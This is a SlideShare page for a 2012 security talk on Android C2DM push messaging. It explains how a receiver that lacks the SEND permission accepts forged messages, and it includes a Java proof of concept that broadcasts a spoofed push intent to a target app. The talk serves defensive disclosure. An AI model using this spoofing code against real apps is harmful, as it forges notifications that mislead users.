SlideShare a Scribd company logo

AC2DM For Security

Download as PPTX, PDF
Jason Ross
Jason Ross

Talks about Google's Cloud to Device (C2D at the time this was written in 2012 - now known as Google Cloud Messaging) technology, and ways it can be misconfigured.

Technology
1 of 16
AC2DM for Security
Android C2DM Overview • Push notification for Android • Rides on Gtalk (XMPP) • Messages limited to 1024 bytes • Account limited to 200,000 messages per day
A confusing process Image taken from http://developer.cisco.com/web/cius-developer/blogroll/-/blogs/android-s-c2dm
Client Registration
App Registration
Message Send
Parts of a Message Required • Registration ID – sent by client • Collapse key – used to avoid flooding • Auth token – header from client login auth Optional • Data - payload • Delay while idle - flag
Manifest Components <permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE“ android:protectionLevel="signature" /> <!– Required to receive C2D messages --> <uses-permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE" /> <!– Required to register and receive registration results --> <uses-permission android:name="com.google.android.c2dm.permission.RECEIVE" /> <!– Internet required  <uses-permission android:name="android.permission.INTERNET" /> <application> <!-- Android C2DM registration receiver --> <receiver android:name=".c2dRegReceiver“ android:permission="com.google.android.c2dm.permission.SEND" > <intent-filter > <action android:name="com.google.android.c2dm.intent.REGISTRATION" ></action> <category android:name="com.intrepidusgroup.c2dm" /> </intent-filter> </receiver> <!-- Android C2DM message receiver --> <receiver android:name=".c2dMsgReceiver“ android:permission="com.google.android.c2dm.permission.SEND" > <intent-filter > <action android:name="com.google.android.c2dm.intent.RECEIVE" ></action> <category android:name="com.intrepidusgroup.c2dm" /> </intent-filter> </receiver> </application>
Real World <permission android:name="com.app.mobile.permission.C2D_MESSAGE" android:protectionLevel="signature" /> <uses-permission android:name="com.app.mobile.permission.C2D_MESSAGE" /> So far so good…
Real World <receiver android:name=".notifications.PushMsgReceiver" android:process=":notifications"> <intent-filter> <action android:name="com.google.android.c2dm.intent.RECEIVE" /> <category android:name="com.ebay.mobile" /> </intent-filter> <intent-filter> <action android:name="com.google.android.c2dm.intent.REGISTRATION" /> <category android:name="com.ebay.mobile" /> </intent-filter> </receiver> <!-- Only C2DM servers can send messages for the app. If permission is not set - any other app can generate it --> <receiver android:name=".C2DMReceiver" android:permission="com.google.android.c2dm.permission.SEND">
So… ZOMG!!
Example Push (seen in logcat) I/PushService( 3990): onHandleIntent: action=3, intent data=Bundle[{ itm=37524594341, push_action=3, title=message received from: jross, collapse_key=jrossig01, sound=m2mmsghdr.caf, evt=M2MMSGHDR, from=appid@gmail.com, usr=jross }]
Spoof (no cloud required) // declare the Intent final Intent sendC2DM = new Intent ("com.google.android.c2dm.intent.RECEIVE"); // set this as category com.app.mobile to match the intent-filter sendC2DM.addCategory("com.app.mobile"); // add the expected data elements sendC2DM.putExtra("itm", "37524594341"); sendC2DM.putExtra("push_action", "3"); sendC2DM.putExtra("title", "message recieved from: C2DSpoofer"); sendC2DM.putExtra("sound", "m2mmsghdr.caf"); sendC2DM.putExtra("evt", "M2MMSGHDR"); sendC2DM.putExtra("usr", send2usr); String collapse_key = randString.genString(rng, chars, 4); sendC2DM.putExtra("collapse_key", collapse_key); // send the message to the on-device push notification receiver sendBroadcast(sendC2DM);
What Happened? • App received a “C2D” message from another application installed on the device. • Because the permission wasn’t set correctly, it accepted the message as though it came from Google. • App displayed message notification, with the “malicious” payload intact.
Other Things We’ve Noticed • Messages that come in may not be accurately received by the activity they are sent to (see: demo). • If you have multiple devices, or multiple users on a single device, things may get tricky.
Questions? Contact: jason.ross@intrepidusgroup.com

Recommended

BP measurement
BP measurementBP measurement
BP measurementSikkim Manipal Institute Of Technology
 
Manual zanussi cocina zcv550 g1xa
Manual zanussi cocina zcv550 g1xaManual zanussi cocina zcv550 g1xa
Manual zanussi cocina zcv550 g1xaAlsako Electrodomésticos
 
Nodejs Security
Nodejs SecurityNodejs Security
Nodejs SecurityJason Ross
 
mtzk.cv.sg
mtzk.cv.sgmtzk.cv.sg
mtzk.cv.sgmay Ko
 
Sai resume updated
Sai resume updatedSai resume updated
Sai resume updatedsaikrishna. matcha
 
Diari del 04 de setembre del 2015
Diari del 04 de setembre del 2015Diari del 04 de setembre del 2015
Diari del 04 de setembre del 2015diarimes
 
Forrest Suehs Resume 2016 - Prof Advan Rev 0
Forrest Suehs Resume 2016 - Prof Advan Rev 0Forrest Suehs Resume 2016 - Prof Advan Rev 0
Forrest Suehs Resume 2016 - Prof Advan Rev 0Forrest Suehs
 
Moving from Social Technology towards an Operating System for the Organisation
Moving from Social Technology towards an Operating System for the OrganisationMoving from Social Technology towards an Operating System for the Organisation
Moving from Social Technology towards an Operating System for the OrganisationLee Bryant
 

Recommended

BP measurement
BP measurementBP measurement
BP measurementSikkim Manipal Institute Of Technology
 
Manual zanussi cocina zcv550 g1xa
Manual zanussi cocina zcv550 g1xaManual zanussi cocina zcv550 g1xa
Manual zanussi cocina zcv550 g1xaAlsako Electrodomésticos
 
Nodejs Security
Nodejs SecurityNodejs Security
Nodejs SecurityJason Ross
 
mtzk.cv.sg
mtzk.cv.sgmtzk.cv.sg
mtzk.cv.sgmay Ko
 
Sai resume updated
Sai resume updatedSai resume updated
Sai resume updatedsaikrishna. matcha
 
Diari del 04 de setembre del 2015
Diari del 04 de setembre del 2015Diari del 04 de setembre del 2015
Diari del 04 de setembre del 2015diarimes
 
Forrest Suehs Resume 2016 - Prof Advan Rev 0
Forrest Suehs Resume 2016 - Prof Advan Rev 0Forrest Suehs Resume 2016 - Prof Advan Rev 0
Forrest Suehs Resume 2016 - Prof Advan Rev 0Forrest Suehs
 
Moving from Social Technology towards an Operating System for the Organisation
Moving from Social Technology towards an Operating System for the OrganisationMoving from Social Technology towards an Operating System for the Organisation
Moving from Social Technology towards an Operating System for the OrganisationLee Bryant
 
FOSS STHLM Android Cloud to Device Messaging
FOSS STHLM Android Cloud to Device MessagingFOSS STHLM Android Cloud to Device Messaging
FOSS STHLM Android Cloud to Device MessagingJohan Nilsson
 
Android Cloud to Device Messaging Framework at GTUG Stockholm
Android Cloud to Device Messaging Framework at GTUG StockholmAndroid Cloud to Device Messaging Framework at GTUG Stockholm
Android Cloud to Device Messaging Framework at GTUG StockholmJohan Nilsson
 
Android Cloud To Device Messaging
Android Cloud To Device MessagingAndroid Cloud To Device Messaging
Android Cloud To Device MessagingFernando Cejas
 
Android cloud to device messaging
Android cloud to device messagingAndroid cloud to device messaging
Android cloud to device messagingFe
 
GCM aperitivo Android
GCM aperitivo AndroidGCM aperitivo Android
GCM aperitivo AndroidLuca Morettoni
 
Workshop: Android
Workshop: AndroidWorkshop: Android
Workshop: AndroidBarcelona Digital Technology Centre
 
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능GDG Korea
 
Gcm presentation
Gcm presentationGcm presentation
Gcm presentationNiraj Singh
 
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...99X Technology
 
Android securitybyexample
Android securitybyexampleAndroid securitybyexample
Android securitybyexamplePragati Rai
 
Максим Щеглов - Google Cloud Messaging for Android
Максим Щеглов - Google Cloud Messaging for AndroidМаксим Щеглов - Google Cloud Messaging for Android
Максим Щеглов - Google Cloud Messaging for AndroidUA Mobile
 
Google Cloud Messaging
Google Cloud MessagingGoogle Cloud Messaging
Google Cloud MessagingAshiq Uz Zoha
 
What's new in android jakarta gdg (2015-08-26)
What's new in android jakarta gdg (2015-08-26)What's new in android jakarta gdg (2015-08-26)
What's new in android jakarta gdg (2015-08-26)Google
 
Push Notification in IBM MobileFirst Xamarin SDK
Push Notification in IBM MobileFirst Xamarin SDKPush Notification in IBM MobileFirst Xamarin SDK
Push Notification in IBM MobileFirst Xamarin SDKAjay Chebbi
 
Magda badita gcm
Magda badita gcmMagda badita gcm
Magda badita gcmGoogle Developer Group Bucharest
 
android level 3
android level 3android level 3
android level 3DevMix
 
testupload
testuploadtestupload
testuploadadmiralderp
 
Android Froyo
Android FroyoAndroid Froyo
Android FroyoRobert Cooper
 
Android push-applications-android
Android push-applications-androidAndroid push-applications-android
Android push-applications-androidwadise
 
Android chat in the cloud
Android chat in the cloudAndroid chat in the cloud
Android chat in the cloudfirenze-gtug
 
Tizen Security
Tizen SecurityTizen Security
Tizen SecurityJason Ross
 
Android malware analysis
Android malware analysisAndroid malware analysis
Android malware analysisJason Ross
 

More Related Content

Similar to AC2DM For Security

FOSS STHLM Android Cloud to Device Messaging
FOSS STHLM Android Cloud to Device MessagingFOSS STHLM Android Cloud to Device Messaging
FOSS STHLM Android Cloud to Device MessagingJohan Nilsson
 
Android Cloud to Device Messaging Framework at GTUG Stockholm
Android Cloud to Device Messaging Framework at GTUG StockholmAndroid Cloud to Device Messaging Framework at GTUG Stockholm
Android Cloud to Device Messaging Framework at GTUG StockholmJohan Nilsson
 
Android Cloud To Device Messaging
Android Cloud To Device MessagingAndroid Cloud To Device Messaging
Android Cloud To Device MessagingFernando Cejas
 
Android cloud to device messaging
Android cloud to device messagingAndroid cloud to device messaging
Android cloud to device messagingFe
 
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능GDG Korea
 
Gcm presentation
Gcm presentationGcm presentation
Gcm presentationNiraj Singh
 
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...99X Technology
 
Android securitybyexample
Android securitybyexampleAndroid securitybyexample
Android securitybyexamplePragati Rai
 
Максим Щеглов - Google Cloud Messaging for Android
Максим Щеглов - Google Cloud Messaging for AndroidМаксим Щеглов - Google Cloud Messaging for Android
Максим Щеглов - Google Cloud Messaging for AndroidUA Mobile
 
Google Cloud Messaging
Google Cloud MessagingGoogle Cloud Messaging
Google Cloud MessagingAshiq Uz Zoha
 
What's new in android jakarta gdg (2015-08-26)
What's new in android jakarta gdg (2015-08-26)What's new in android jakarta gdg (2015-08-26)
What's new in android jakarta gdg (2015-08-26)Google
 
Push Notification in IBM MobileFirst Xamarin SDK
Push Notification in IBM MobileFirst Xamarin SDKPush Notification in IBM MobileFirst Xamarin SDK
Push Notification in IBM MobileFirst Xamarin SDKAjay Chebbi
 
android level 3
android level 3android level 3
android level 3DevMix
 
Android push-applications-android
Android push-applications-androidAndroid push-applications-android
Android push-applications-androidwadise
 
Android chat in the cloud
Android chat in the cloudAndroid chat in the cloud
Android chat in the cloudfirenze-gtug
 

Similar to AC2DM For Security (20)

FOSS STHLM Android Cloud to Device Messaging
FOSS STHLM Android Cloud to Device MessagingFOSS STHLM Android Cloud to Device Messaging
FOSS STHLM Android Cloud to Device Messaging
 
Android Cloud to Device Messaging Framework at GTUG Stockholm
Android Cloud to Device Messaging Framework at GTUG StockholmAndroid Cloud to Device Messaging Framework at GTUG Stockholm
Android Cloud to Device Messaging Framework at GTUG Stockholm
 
Android Cloud To Device Messaging
Android Cloud To Device MessagingAndroid Cloud To Device Messaging
Android Cloud To Device Messaging
 
Android cloud to device messaging
Android cloud to device messagingAndroid cloud to device messaging
Android cloud to device messaging
 
GCM aperitivo Android
GCM aperitivo AndroidGCM aperitivo Android
GCM aperitivo Android
 
Workshop: Android
Workshop: AndroidWorkshop: Android
Workshop: Android
 
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능
GKAC 2014 Nov. - 안드로이드 5.0의 새로운 기능
 
Gcm presentation
Gcm presentationGcm presentation
Gcm presentation
 
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...
Colombo Mobile Developer MeetUp - Building Scalable Cloud Connected Mobile Ap...
 
Android securitybyexample
Android securitybyexampleAndroid securitybyexample
Android securitybyexample
 
Максим Щеглов - Google Cloud Messaging for Android
Максим Щеглов - Google Cloud Messaging for AndroidМаксим Щеглов - Google Cloud Messaging for Android
Максим Щеглов - Google Cloud Messaging for Android
 
Google Cloud Messaging
Google Cloud MessagingGoogle Cloud Messaging
Google Cloud Messaging
 
What's new in android jakarta gdg (2015-08-26)
What's new in android jakarta gdg (2015-08-26)What's new in android jakarta gdg (2015-08-26)
What's new in android jakarta gdg (2015-08-26)
 
Push Notification in IBM MobileFirst Xamarin SDK
Push Notification in IBM MobileFirst Xamarin SDKPush Notification in IBM MobileFirst Xamarin SDK
Push Notification in IBM MobileFirst Xamarin SDK
 
Magda badita gcm
Magda badita gcmMagda badita gcm
Magda badita gcm
 
android level 3
android level 3android level 3
android level 3
 
testupload
testuploadtestupload
testupload
 
Android Froyo
Android FroyoAndroid Froyo
Android Froyo
 
Android push-applications-android
Android push-applications-androidAndroid push-applications-android
Android push-applications-android
 
Android chat in the cloud
Android chat in the cloudAndroid chat in the cloud
Android chat in the cloud
 

More from Jason Ross

Tizen Security
Tizen SecurityTizen Security
Tizen SecurityJason Ross
 
Android malware analysis
Android malware analysisAndroid malware analysis
Android malware analysisJason Ross
 
Alice and Bob are Eff'd
Alice and Bob are Eff'dAlice and Bob are Eff'd
Alice and Bob are Eff'dJason Ross
 
WHOIS the Master
WHOIS the MasterWHOIS the Master
WHOIS the MasterJason Ross
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The EnterpriseJason Ross
 
Dev opsec killing-the_buzz
Dev opsec killing-the_buzzDev opsec killing-the_buzz
Dev opsec killing-the_buzzJason Ross
 

More from Jason Ross (6)

Tizen Security
Tizen SecurityTizen Security
Tizen Security
 
Android malware analysis
Android malware analysisAndroid malware analysis
Android malware analysis
 
Alice and Bob are Eff'd
Alice and Bob are Eff'dAlice and Bob are Eff'd
Alice and Bob are Eff'd
 
WHOIS the Master
WHOIS the MasterWHOIS the Master
WHOIS the Master
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
 
Dev opsec killing-the_buzz
Dev opsec killing-the_buzzDev opsec killing-the_buzz
Dev opsec killing-the_buzz
 

Recently uploaded

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...Martijn de Jong
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxKatpro Technologies
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 

Recently uploaded (20)

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptxFactors to Consider When Choosing Accounts Payable Services Providers.pptx
Factors to Consider When Choosing Accounts Payable Services Providers.pptx
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 

AC2DM For Security

  • 2. Android C2DM Overview • Push notification for Android • Rides on Gtalk (XMPP) • Messages limited to 1024 bytes • Account limited to 200,000 messages per day
  • 3. A confusing process Image taken from http://developer.cisco.com/web/cius-developer/blogroll/-/blogs/android-s-c2dm
  • 7. Parts of a Message Required • Registration ID – sent by client • Collapse key – used to avoid flooding • Auth token – header from client login auth Optional • Data - payload • Delay while idle - flag
  • 8. Manifest Components <permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE“ android:protectionLevel="signature" /> <!– Required to receive C2D messages --> <uses-permission android:name="com.intrepidusgroup.c2dm.permission.C2D_MESSAGE" /> <!– Required to register and receive registration results --> <uses-permission android:name="com.google.android.c2dm.permission.RECEIVE" /> <!– Internet required  <uses-permission android:name="android.permission.INTERNET" /> <application> <!-- Android C2DM registration receiver --> <receiver android:name=".c2dRegReceiver“ android:permission="com.google.android.c2dm.permission.SEND" > <intent-filter > <action android:name="com.google.android.c2dm.intent.REGISTRATION" ></action> <category android:name="com.intrepidusgroup.c2dm" /> </intent-filter> </receiver> <!-- Android C2DM message receiver --> <receiver android:name=".c2dMsgReceiver“ android:permission="com.google.android.c2dm.permission.SEND" > <intent-filter > <action android:name="com.google.android.c2dm.intent.RECEIVE" ></action> <category android:name="com.intrepidusgroup.c2dm" /> </intent-filter> </receiver> </application>
  • 10. Real World <receiver android:name=".notifications.PushMsgReceiver" android:process=":notifications"> <intent-filter> <action android:name="com.google.android.c2dm.intent.RECEIVE" /> <category android:name="com.ebay.mobile" /> </intent-filter> <intent-filter> <action android:name="com.google.android.c2dm.intent.REGISTRATION" /> <category android:name="com.ebay.mobile" /> </intent-filter> </receiver> <!-- Only C2DM servers can send messages for the app. If permission is not set - any other app can generate it --> <receiver android:name=".C2DMReceiver" android:permission="com.google.android.c2dm.permission.SEND">
  • 12. Example Push (seen in logcat) I/PushService( 3990): onHandleIntent: action=3, intent data=Bundle[{ itm=37524594341, push_action=3, title=message received from: jross, collapse_key=jrossig01, sound=m2mmsghdr.caf, evt=M2MMSGHDR, from=appid@gmail.com, usr=jross }]
  • 13. Spoof (no cloud required) // declare the Intent final Intent sendC2DM = new Intent ("com.google.android.c2dm.intent.RECEIVE"); // set this as category com.app.mobile to match the intent-filter sendC2DM.addCategory("com.app.mobile"); // add the expected data elements sendC2DM.putExtra("itm", "37524594341"); sendC2DM.putExtra("push_action", "3"); sendC2DM.putExtra("title", "message recieved from: C2DSpoofer"); sendC2DM.putExtra("sound", "m2mmsghdr.caf"); sendC2DM.putExtra("evt", "M2MMSGHDR"); sendC2DM.putExtra("usr", send2usr); String collapse_key = randString.genString(rng, chars, 4); sendC2DM.putExtra("collapse_key", collapse_key); // send the message to the on-device push notification receiver sendBroadcast(sendC2DM);
  • 14. What Happened? • App received a “C2D” message from another application installed on the device. • Because the permission wasn’t set correctly, it accepted the message as though it came from Google. • App displayed message notification, with the “malicious” payload intact.
  • 15. Other Things We’ve Noticed • Messages that come in may not be accurately received by the activity they are sent to (see: demo). • If you have multiple devices, or multiple users on a single device, things may get tricky.

Editor's Notes

  1. registration_id = The registration ID retrieved from the Android application on the phone. Required. collapse_key = An arbitrary string that is used to collapse a group of like messages when the device is offline, so that only the last message gets sent to the client. This is intended to avoid sending too many messages to the phone when it comes back online. Note that since there is no guarantee of the order in which messages get sent, the "last" message may not actually be the last message sent by the application server. Required. data.<key>= Payload data, expressed as key-value pairs. If present, it will be included in the Intent as application data, with the <key>. There is no limit on the number of key/value pairs, though there is a limit on the total size of the message. Optional. delay_while_idle = If included, indicates that the message should not be sent immediately if the device is idle. The server will wait for the device to become active, and then only the last message for each collapse_key value will be sent. Optional. Authorization = GoogleLogin auth=[AUTH_TOKEN]Header with a ClientLogin Auth token. The cookie must be associated with the ac2dm service. Required.
  2. This requires the application signature be present when the permission is used This restrict the C2D messages such that they must be sourced from Google in order for the application to process them. If the “android:permission” portion is missing, anyone can push messages of this type (Registration results) to the application. Same as #2, but for the actual C2D messages